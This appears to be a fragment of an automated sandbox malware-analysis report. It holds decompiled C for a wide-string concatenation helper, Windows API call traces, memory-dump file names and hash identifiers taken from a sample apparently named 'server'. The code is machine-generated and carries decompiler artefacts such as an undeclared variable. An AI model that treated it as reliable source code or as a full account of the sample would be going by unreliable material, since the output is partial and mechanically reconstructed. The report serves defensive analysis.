            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E5DE4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
            				void* _v8;
            				void* _t18;
            				int _t25;
            				int _t29;
            				int _t34;
            
            				_t29 = lstrlenW(_a4);
            				_t25 = lstrlenW(_a8);
            				_t18 = E047E33DC(_t25 + _t29 + _t25 + _t29 + 2);
            				_v8 = _t18;
            				if(_t18 != 0) {
            					_t34 = _t29 + _t29;
            					memcpy(_t18, _a4, _t34);
            					_t10 = _t25 + 2; // 0x2
            					memcpy(_v8 + _t34, _a8, _t25 + _t10);
            				}
            				return _v8;
            			}








            0x047e5df9
            0x047e5dfd
            0x047e5e07
            0x047e5e0c
            0x047e5e11
            0x047e5e13
            0x047e5e1b
            0x047e5e20
            0x047e5e2e
            0x047e5e33
            0x047e5e3d

            APIs
            • lstrlenW.KERNEL32(004F0053,?,74655520,00000008,05429270,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DF4
            • lstrlenW.KERNEL32(047E52D0,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5DFB
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • memcpy.NTDLL(00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270,?,?,?,?,?,?,047E68B6), ref: 047E5E1B
            • memcpy.NTDLL(746569A0,047E52D0,00000002,00000000,004F0053,746569A0,?,?,047E52D0,004F0053,05429270), ref: 047E5E2E
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlenmemcpy$AllocateHeap
            • String ID:
            • API String ID: 2411391700-0
            • Opcode ID: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
            • Instruction ID: 20fd9da3df1830f4887803cf6f41c31171fa48fe9776cb311088cbceae12cc14
            • Opcode Fuzzy Hash: 3445f39cdf57d1eb18604285b1ae0f6d430eb0510e2c4d3dfbf8f0cf2be4acca
            • Instruction Fuzzy Hash: 65F04F7290011DBBDF11DFE9CC48CDE7BADEF082587114162ED04D7201E635EA108BA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
            • lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
            • lstrcat.KERNEL32(00000000,?), ref: 047E759A
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
            • String ID:
            • API String ID: 74227042-0
            • Opcode ID: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
            • Instruction ID: 34b01fc7b4db0c77e45140fe8a855fa816009c6bf1dddb56ee590de16562fb08
            • Opcode Fuzzy Hash: 638c374d535c7b2aee9e3c2b5b826b7783e3927fcc8cd9af105959e5ac25ae31
            • Instruction Fuzzy Hash: 1CE09BB35016215B87115BA6AC48CAFB76CFF8D6503044916F700D7200D735DD0187A1
            Uniqueness

            Uniqueness Score: -1.00%